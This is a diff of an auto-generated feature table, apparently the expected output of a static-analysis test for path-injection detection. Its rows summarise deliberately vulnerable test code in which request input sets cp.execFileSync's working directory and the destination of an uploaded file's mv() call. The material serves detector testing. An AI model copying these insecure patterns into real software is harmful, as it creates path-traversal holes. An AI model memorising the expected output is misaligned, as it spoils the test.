autogenerated/TaintedPath/TaintedPath.js:213:3:213:4 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:4 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:17 | cp.execFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:17 | cp.execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:17 | cp.execFileSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:17 | cp.execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:17 | cp.execFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | cp.exec ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | exceptional return of cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | exceptional return of cp.exec ... path}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | exceptional return of cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | exceptional return of cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:3:213:50 | exceptional return of cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:6:213:17 | execFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:6:213:17 | execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:6:213:17 | execFileSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:6:213:17 | execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:6:213:17 | execFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:19:213:26 | "foobar" | CalleeFlexibleAccessPath | cp.execFileSync | | autogenerated/TaintedPath/TaintedPath.js:213:19:213:26 | "foobar" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:213:19:213:26 | "foobar" | calleeImports | child_process | @@ -6901,9 +66791,14 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:213:29:213:36 | ["args"] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:29:213:36 | ["args"] | receiverName | cp | | autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | | autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:30:213:35 | "args" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:39:213:49 | {cwd: path} | CalleeFlexibleAccessPath | cp.execFileSync | | autogenerated/TaintedPath/TaintedPath.js:213:39:213:49 | {cwd: path} | InputArgumentIndex | 2 | @@ -6914,6 +66809,21 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:213:39:213:49 | {cwd: path} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:213:39:213:49 | {cwd: path} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:39:213:49 | {cwd: path} | receiverName | cp | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:42 | cwd | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:42 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:42 | cwd | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:42 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:42 | cwd | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:213:40:213:48 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | CalleeFlexibleAccessPath | cp.execFileSync | | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | InputAccessPathFromCallee | 2.cwd | | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | InputArgumentIndex | 2 | @@ -6924,6 +66834,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:213:45:213:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:4 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:4 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:4 | cp | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:4 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:4 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:17 | cp.execFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:17 | cp.execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:17 | cp.execFileSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:17 | cp.execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:17 | cp.execFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | cp.exec ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | exceptional return of cp.exec ... path}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | exceptional return of cp.exec ... path}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | exceptional return of cp.exec ... path}) | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | exceptional return of cp.exec ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:3:214:40 | exceptional return of cp.exec ... path}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:6:214:17 | execFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:6:214:17 | execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:6:214:17 | execFileSync | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:6:214:17 | execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:6:214:17 | execFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:214:19:214:26 | "foobar" | CalleeFlexibleAccessPath | cp.execFileSync | | autogenerated/TaintedPath/TaintedPath.js:214:19:214:26 | "foobar" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:214:19:214:26 | "foobar" | calleeImports | child_process | @@ -6942,6 +66877,21 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:214:29:214:39 | {cwd: path} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:214:29:214:39 | {cwd: path} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:214:29:214:39 | {cwd: path} | receiverName | cp | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:32 | cwd | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:32 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:32 | cwd | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:32 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:32 | cwd | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:214:30:214:38 | cwd: path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | CalleeFlexibleAccessPath | cp.execFileSync | | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | InputAccessPathFromCallee | 1.cwd | | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | InputArgumentIndex | 1 | @@ -6952,18 +66902,99 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | enclosingFunctionBody | req res path url parse req url true query path cp execSync foobar cwd path cp execFileSync foobar args cwd path cp execFileSync foobar cwd path | | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:214:35:214:38 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/express.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:1:1:0 | this | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:1:1:1 | require | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:5:1:11 | express | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express ... press") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express ... press") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:5:1:32 | express ... press") | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:15:1:21 | require | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:15:1:32 | exceptional return of require("express") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:15:1:32 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:15:1:32 | exceptional return of require("express") | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:1:15:1:32 | require("express") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:1:15:1:32 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:1:15:1:32 | require("express") | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | calleeImports | | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | contextFunctionInterfaces | | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/express.js:1:23:1:31 | "express" | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:3:2:12 | fileUpload | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:3:2:12 | fileUpload | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:3:2:12 | fileUpload | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpl ... pload") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpl ... pload") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpl ... pload") | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpload | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpload | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:3:2:44 | fileUpload | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:16:2:22 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:16:2:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:16:2:22 | require | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:16:2:44 | exceptional return of require ... pload") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:16:2:44 | exceptional return of require ... pload") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:16:2:44 | exceptional return of require ... pload") | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:2:16:2:44 | require ... pload") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:2:16:2:44 | require ... pload") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:2:16:2:44 | require ... pload") | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | calleeImports | | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | contextFunctionInterfaces | | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/express.js:2:24:2:43 | "express-fileupload" | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:5:4:7 | app | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:5:4:19 | app = express() | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:11:4:17 | express | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:11:4:19 | exceptional return of express() | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:4:11:4:19 | express() | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:1:5:3 | app | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:1:5:7 | app.use | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:1:5:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:1:5:7 | app.use | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:1:5:21 | app.use ... load()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:1:5:21 | app.use ... load()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:1:5:21 | app.use ... load()) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:1:5:21 | exceptional return of app.use ... load()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:1:5:21 | exceptional return of app.use ... load()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:1:5:21 | exceptional return of app.use ... load()) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:5:5:7 | use | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:5:5:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:5:5:7 | use | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:9:5:18 | fileUpload | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:9:5:18 | fileUpload | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:9:5:18 | fileUpload | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:5:9:5:20 | exceptional return of fileUpload() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:5:9:5:20 | exceptional return of fileUpload() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:5:9:5:20 | exceptional return of fileUpload() | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | CalleeFlexibleAccessPath | app.use | | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | InputArgumentIndex | 0 | | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | calleeImports | express | @@ -6971,6 +67002,21 @@ tokenFeatures | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:5:9:5:20 | fileUpload() | receiverName | app | +| autogenerated/TaintedPath/express.js:7:1:7:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:1:7:3 | app | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:1:7:7 | app.get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:1:7:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:1:7:7 | app.get | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:1:9:2 | app.get ... ar);\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:1:9:2 | app.get ... ar);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:1:9:2 | app.get ... ar);\\n}) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:1:9:2 | exceptional return of app.get ... ar);\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:1:9:2 | exceptional return of app.get ... ar);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:1:9:2 | exceptional return of app.get ... ar);\\n}) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:5:7:7 | get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:5:7:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:5:7:7 | get | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | calleeImports | express | @@ -6978,6 +67024,21 @@ tokenFeatures | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:7:9:7:20 | "/some/path" | receiverName | app | +| autogenerated/TaintedPath/express.js:7:23:7:22 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:23:7:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:23:7:22 | this | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:23:7:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:23:7:22 | this | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:23:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:23:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:23:9:1 | 'arguments' object of anonymous function | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:23:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | exceptional return of anonymous function | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:23:9:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:23:9:1 | exceptional return of anonymous function | 